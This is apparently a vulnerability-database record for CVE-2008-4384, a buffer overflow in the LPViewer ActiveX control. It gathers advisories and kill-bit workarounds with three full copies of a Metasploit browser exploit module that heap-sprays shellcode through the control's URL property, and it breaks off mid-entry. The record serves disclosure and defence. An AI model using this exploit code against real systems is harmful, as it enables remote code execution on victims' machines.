The LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software.
Problem
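A buffer overflow vulnerability (CVE-2008-4384) allows command execution when a user opens a web page that loads the LPViewer ActiveX Control and sets its url property to a long, specially crafted value. Resolution, as given in the advisory record below: set the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in Microsoft knowledge base article 240797.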
Limitations: the exploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer.
Platforms
Windows
{"enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2016-10-03T15:01:56", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4384"]}, {"type": "cert", "idList": ["VU:848873"]}, {"type": "seebug", "idList": ["SSV:4170"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/LPVIEWER_URL"]}, {"type": "exploitdb", "idList": ["EDB-ID:16571"]}, {"type": "saint", "idList": ["SAINT:25041479E7D3944631E9BAB1B0D891B8", "SAINT:C7562772402003F103F2D6EA21E2BDA4"]}, {"type": "nessus", "idList": ["LPVIEWER_ACTIVEX_OVERFLOWS.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83104"]}], "modified": "2016-10-03T15:01:56", "rev": 2}, "vulnersScore": 8.1}, "reporter": "SAINT Corporation", "id": "SAINT:66112B6C7CF3B8CEB0B9B499657CAE25", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "published": "2008-11-21T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "modified": "2008-11-21T00:00:00", "references": [], "cvelist": ["CVE-2008-4384"], "description": "Added: 11/21/2008 \nCVE: [CVE-2008-4384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384>) \nBID: [31604](<http://www.securityfocus.com/bid/31604>) \nOSVDB: [48946](<http://www.osvdb.org/48946>) \n\n\n### Background\n\nThe LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property. \n\n### Resolution\n\nSet the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in [Microsoft knowledge base article 240797](<http://support.microsoft.com/kb/240797>). 
\n\n### References\n\n<http://www.kb.cert.org/vuls/id/848873> \n\n\n### Limitations\n\nExploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "type": "saint", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/lpviewer_url", "lastseen": "2016-10-03T15:01:56", "edition": 1, "title": "LPViewer ActiveX Control url property buffer overflow"}
{"cve": [{"lastseen": "2020-10-03T11:51:02", "description": "Multiple stack-based buffer overflows in MGI Software LPViewer ActiveX control (LPControl.dll), as acquired by Roxio and iseemedia, allow remote attackers to execute arbitrary code via the (1) url, (2) toolbar, and (3) enableZoomPastMax methods.", "edition": 3, "cvss3": {}, "published": "2008-10-07T20:00:00", "title": "CVE-2008-4384", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4384"], "modified": "2017-08-08T01:32:00", "cpe": ["cpe:/a:mgi_software:lpviewer:*", "cpe:/a:roxio:lpviewer:*", "cpe:/a:iseemedia:lpviewer:*"], "id": "CVE-2008-4384", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4384", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:roxio:lpviewer:*:*:*:*:*:*:*:*", "cpe:2.3:a:mgi_software:lpviewer:*:*:*:*:*:*:*:*", "cpe:2.3:a:iseemedia:lpviewer:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:23:50", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83104", "href": "https://packetstormsecurity.com/files/83104/iseemedia-Roxio-MGI-Software-LPViewer-ActiveX-Control-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## 
redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When \nsending an overly long string to the URL() property an attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC' ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2008-4384' ], \n[ 'OSVDB', '48946' ], \n[ 'US-CERT-VU', '848873' ], \n[ 'BID', '31604' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ] \n], \n'DisclosureDate' => 'Oct 6 2008', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n# Re-generate the payload. \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Create some nops. \nnops = Rex::Text.to_unescape(make_nops(4)) \n \n# Set the return. \nret = Rex::Text.uri_encode([target.ret].pack('L')) \n \n# Randomize the javascript variable names. 
\nvname = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(30) + 2) \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \nrand8 = rand_text_alpha(rand(100) + 1) \n \ncontent = %Q| \n<html> \n<head> \n<script> \ntry { \nvar #{vname} = new ActiveXObject('LPViewer.LPViewer.1'); \nvar #{rand1} = unescape('#{shellcode}'); \nvar #{rand2} = unescape('#{nops}'); \nvar #{rand3} = 20; \nvar #{rand4} = #{rand3} + #{rand1}.length; \nwhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2}; \nvar #{rand5} = #{rand2}.substring(0,#{rand4}); \nvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4}); \nwhile (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5}; \nvar #{rand7} = new Array(); \nfor (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} } \nvar #{rand8} = \"\"; \nfor (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') } \n#{vname}.URL = #{rand8}; \n} catch( e ) { window.location = 'about:blank' ; } \n</script> \n</head> \n</html> \n| \n \ncontent = Rex::Text.randomize_space(content) \n \nprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83104/lpviewer_url.rb.txt"}], "saint": [{"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "description": "Added: 11/21/2008 \nCVE: [CVE-2008-4384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384>) \nBID: 
[31604](<http://www.securityfocus.com/bid/31604>) \nOSVDB: [48946](<http://www.osvdb.org/48946>) \n\n\n### Background\n\nThe LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property. \n\n### Resolution\n\nSet the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in [Microsoft knowledge base article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/848873> \n\n\n### Limitations\n\nExploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2008-11-21T00:00:00", "published": "2008-11-21T00:00:00", "id": "SAINT:C7562772402003F103F2D6EA21E2BDA4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/lpviewer_url", "title": "LPViewer ActiveX Control url property buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "edition": 2, "description": "Added: 11/21/2008 \nCVE: [CVE-2008-4384](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4384>) \nBID: [31604](<http://www.securityfocus.com/bid/31604>) \nOSVDB: [48946](<http://www.osvdb.org/48946>) \n\n\n### Background\n\nThe LPViewer ActiveX Control installs with the iseemedia ZOOM control viewer and allows viewing of images created with iseemedia software. \n\n### Problem\n\nA buffer overflow vulnerability allows command execution when a user opens a web page which runs the LPViewer ActiveX Control with a long, specially crafted url property. 
\n\n### Resolution\n\nSet the kill bit for Class ID 3F0EECCE-E138-11D1-8712-0060083D83F5 as described in [Microsoft knowledge base article 240797](<http://support.microsoft.com/kb/240797>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/848873> \n\n\n### Limitations\n\nExploit works on iseemedia Browser Plugin Viewer 3.6 and requires a user to open the exploit file in Internet Explorer. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2008-11-21T00:00:00", "published": "2008-11-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/lpviewer_url", "id": "SAINT:25041479E7D3944631E9BAB1B0D891B8", "title": "LPViewer ActiveX Control url property buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:24", "bulletinFamily": "info", "cvelist": ["CVE-2008-4384"], "description": "### Overview \n\nThe iseemedia LPViewer ActiveX control contains multiple stack buffer overflows, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe iseemedia LPViewer ActiveX control, which is provided by the file `LPControl.dll`, is a component that was created by MGI Software. It was then acquired by Roxio, and then iseemedia after that. The LPViewer ActiveX control contains stack buffer overflows in the `url()`, `toolbar()`, and `enableZoomPastMax()` methods. \n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash. \n \n--- \n \n### Solution \n\nWe are currently unaware of a practical solution to this problem. 
Please consider the following workarounds: \n \n--- \n \n**Disable the LPViewer ActiveX control in Internet Explorer** \n \nThe vulnerable ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{3F0EECCE-E138-11D1-8712-0060083D83F5}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). Alternatively, the following text can be saved as a `.REG` file and imported to set the kill bit for this control: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{3F0EECCE-E138-11D1-8712-0060083D83F5}]` \n`\"Compatibility Flags\"=dword:00000400` \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>)\" document. \n \n--- \n \n### Vendor Information\n\n848873\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### MGI Software __ Affected\n\nUpdated: October 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23848873 Feedback>).\n\n### Roxio __ Affected\n\nNotified: June 18, 2007 Updated: October 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23848873 Feedback>).\n\n### iseemedia __ Affected\n\nNotified: August 22, 2008 Updated: October 06, 2008 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease disable the vulnerable control.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23848873 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:Not Defined (ND)/RL:Not Defined (ND)/RC:Not Defined (ND) \nEnvironmental | 0 | CDP:Not Defined (ND)/TD:Not Defined (ND)/CR:Not Defined (ND)/IR:Not Defined (ND)/AR:Not Defined (ND) \n \n \n\n\n### References \n\n * <http://support.microsoft.com/kb/240797>\n * 
<http://www.iseemedia.com/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Will Dormann of the CERT/CC.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-4384](<http://web.nvd.nist.gov/vuln/detail/CVE-2008-4384>) \n---|--- \n**Severity Metric:** | 1.82 \n**Date Public:** | 2008-10-06 \n**Date First Published:** | 2008-10-06 \n**Date Last Updated: ** | 2009-04-13 17:20 UTC \n**Document Revision: ** | 16 \n", "modified": "2009-04-13T17:20:00", "published": "2008-10-06T00:00:00", "id": "VU:848873", "href": "https://www.kb.cert.org/vuls/id/848873", "type": "cert", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX control stack buffer overflows", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T00:09:45", "description": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow. CVE-2008-4384. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16571", "href": "https://www.exploit-db.com/exploits/16571/", "sourceData": "##\r\n# $Id: lpviewer_url.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\r\n\t\t\t\tsending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-4384' ],\r\n\t\t\t\t\t[ 'OSVDB', '48946' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '848873' ],\r\n\t\t\t\t\t[ 'BID', '31604' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 6 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload.\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Create some nops.\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Set the 
return.\r\n\t\tret = Rex::Text.uri_encode([target.ret].pack('L'))\r\n\r\n\t\t# Randomize the javascript variable names.\r\n\t\tvname = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(30) + 2)\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tcontent = %Q|\r\n\t<html>\r\n\t<head>\r\n\t\t<script>\r\n\t\ttry {\r\n\t\t\tvar #{vname} = new ActiveXObject('LPViewer.LPViewer.1');\r\n\t\t\tvar #{rand1} = unescape('#{shellcode}');\r\n\t\t\tvar #{rand2} = unescape('#{nops}');\r\n\t\t\tvar #{rand3} = 20;\r\n\t\t\tvar #{rand4} = #{rand3} + #{rand1}.length;\r\n\t\t\twhile (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};\r\n\t\t\tvar #{rand5} = #{rand2}.substring(0,#{rand4});\r\n\t\t\tvar #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});\r\n\t\t\twhile (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};\r\n\t\t\tvar #{rand7} = new Array();\r\n\t\t\tfor (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }\r\n\t\t\tvar #{rand8} = \"\";\r\n\t\t\tfor (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }\r\n\t\t\t#{vname}.URL = #{rand8};\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t</script>\r\n\t</head>\r\n\t</html>\r\n\t\t\t\t|\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16571/"}], "seebug": [{"lastseen": "2017-11-19T21:24:06", "description": "BUGTRAQ ID: 31604\r\nCVE ID\uff1aCVE-2008-4384\r\nCNCVE ID\uff1aCNCVE-20084384\r\n\r\niseemedia\u662f\u4e00\u6b3e\u56fe\u50cf\u5904\u7406\u8f6f\u4ef6\u3002\r\niseemedia LPViewer ActiveX\u63a7\u4ef6\u5b58\u5728\u591a\u4e2a\u57fa\u4e8e\u6808\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\nLPControl.dll\u6587\u4ef6\u63d0\u4f9b\u4e86iseemedia LPViewer ActiveX\u63a7\u4ef6\uff0c\u63a7\u4ef6\u5bf9url(), toolbar(), \u548cenableZoomPastMax()\u65b9\u6cd5\u5904\u7406\u7f3a\u5c11\u5145\u5206\u7684\u8fb9\u754c\u68c0\u67e5\uff0c\u6784\u5efa\u6076\u610fHTML\u6587\u6863\uff0c\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\uff0c\u53ef\u5bfc\u81f4\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\n\niseemedia LPViewer\n \u53ef\u53c2\u8003\u5982\u4e0b\u4e34\u65f6\u89e3\u51b3\u65b9\u6848\uff1a\r\n\u7f16\u8f91\u5982\u4e0b\u6587\u672c\u5e76\u4fdd\u5b58\u4e3a\u4ee5.reg\u7ed3\u5c3e\u7684\u6587\u4ef6\u5e76\u53cc\u51fb\u5bfc\u5165\uff1a\r\nWindows Registry Editor Version 5.00\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{3F0EECCE-E138-11D1-8712-0060083D83F5}]\r\n"Compatibility Flags"=dword:00000400\r\n\u76ee\u524d\u4f9b\u5e94\u5546\u6ca1\u6709\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\n<a href=http://www.iseemedia.com/ target=_blank>http://www.iseemedia.com/</a>", "published": "2008-10-08T00:00:00", "type": "seebug", "title": "iseemedia 'LPControl.dll' LPViewer ActiveX\u63a7\u4ef6\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2008-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4170", "id": 
"SSV:4170", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-05-26T22:14:17", "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n", "published": "2008-10-14T13:41:52", "type": "metasploit", "title": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4384"], "modified": "2017-10-05T21:44:36", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/LPVIEWER_URL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). 
When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2008-4384' ],\n [ 'OSVDB', '48946' ],\n [ 'US-CERT-VU', '848873' ],\n [ 'BID', '31604' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ]\n ],\n 'DisclosureDate' => 'Oct 6 2008',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Create some nops.\n nops = Rex::Text.to_unescape(make_nops(4))\n\n # Set the return.\n ret = Rex::Text.uri_encode([target.ret].pack('L'))\n\n # Randomize the javascript variable names.\n vname = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(30) + 2)\n rand1 = rand_text_alpha(rand(100) + 1)\n rand2 = rand_text_alpha(rand(100) + 1)\n rand3 = rand_text_alpha(rand(100) + 1)\n rand4 = rand_text_alpha(rand(100) + 1)\n rand5 = rand_text_alpha(rand(100) + 1)\n rand6 = rand_text_alpha(rand(100) + 1)\n rand7 = rand_text_alpha(rand(100) + 1)\n rand8 = rand_text_alpha(rand(100) + 1)\n\n content = %Q|\n <html>\n <head>\n <script>\n try {\n var #{vname} = new ActiveXObject('LPViewer.LPViewer.1');\n var #{rand1} = unescape('#{shellcode}');\n var #{randnop} = \"#{nops}\";\n var #{rand2} = unescape(#{randnop});\n var #{rand3} = 20;\n var #{rand4} = #{rand3} + #{rand1}.length;\n while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};\n var #{rand5} = #{rand2}.substring(0,#{rand4});\n var #{rand6} = #{rand2}.substring(0,#{rand2}.length - 
#{rand4});\n while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};\n var #{rand7} = new Array();\n for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }\n var #{rand8} = \"\";\n for (#{var_i} = 0; #{var_i} < 1224; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }\n #{vname}.URL = #{rand8};\n } catch( e ) { window.location = 'about:blank' ; }\n </script>\n </head>\n </html>\n |\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/lpviewer_url.rb"}], "nessus": [{"lastseen": "2021-01-01T03:20:14", "description": "The remote host contains the LPViewer ActiveX control, initially\ncreated by MGI Software but later taken over by Roxio and then again\nby iseemedia.\n\nThis control reportedly has stack-based buffer overflows in its\n'url()', 'toolbar()', and 'enableZoomPastMax()' methods. 
